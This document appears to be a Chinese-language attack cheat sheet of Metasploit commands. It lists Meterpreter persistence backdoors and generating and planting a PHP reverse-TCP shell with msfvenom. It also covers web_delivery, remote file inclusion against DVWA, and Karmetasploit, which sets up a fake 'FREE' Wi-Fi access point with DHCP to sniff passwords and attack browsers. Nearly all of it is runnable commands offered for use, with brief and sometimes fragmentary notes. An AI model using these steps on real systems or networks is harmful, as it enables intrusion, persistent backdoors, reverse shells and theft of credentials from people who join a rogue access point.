持久后门
- metepreter后门
- run exploit/windows/local/persistence
- run persistence -X
延伸用法
Mimikatz
PHP shell
- msfvenom -p php/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=3333 -f raw -o a.php
- 把a.php放在目标机器的web页面
- meterpreter > use multi/handler
- set payload php/meterpreter/reverse_tcp
- run
- 当访问php页面是,就触发反弹shell
Web Delivery
- 利用代码执行漏洞访问攻击者服务器
- use exploit/multi/script/web_delivery
- set target 1
- php -d allow_url_fopen=true -r
RFI远程文件包含
- vi /etc/php5/cgi/php.ini
- allow_url_fopen=On
- allow_url_include=On
- use exploit/unix/webapp/php_include
- set RHOST、
- set PATH /dvwa/vulnerabilities/fi/
- set PHPURI /?page=XXpathXX
- set HEADERS
Karmetasploit
伪造AP、嗅探密码、截获数据、浏览器攻击
wget https://www.offensive-security.com/wp-content/uploads/2015/04/karma.rc_.txt
安装其它依赖包
- gem install activerecord sqlite3-ruby
基础架构安装配置
- apt-get install isc-dhcp-server
- cat /etc/dhcp/dhcpd.conf
- option domain-name-server 10.0.0.1; #伪造的ap的地址
- max-lease-time 72; #租约期限短,用户断网后快速恢复
- authoritative#如果自己不启动授权,别人启动授权,自己的dhcp会失效
- log-facility local7;
- subnet 10.0.0.0 netmask 255.255.255.0{
- range 10.0.0.10 10.0.0.200;
- option routers 10.0.0.1;
- option domain-name-servers 10.0.0.1;#子网段内的dnsServer,如果和全局不同,则可以指定。
- }
伪造AP
airmon-ng start wlan0
airbase-ng -P -C 30 -e “FREE” -v wlan0mon #
ifconfig -a
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
dhcpd -cf /etc/dhcp/dhcpd.conf at0
当有设备连接后
- msfconsole -q -r karma.rc_.txt
- 可以看到流量信息,但用户上不了网
- gedit karma.rc_.txt
- 删掉db_connect、setg、set LPORT
- 加上auxiliary/server/browser_autorpwn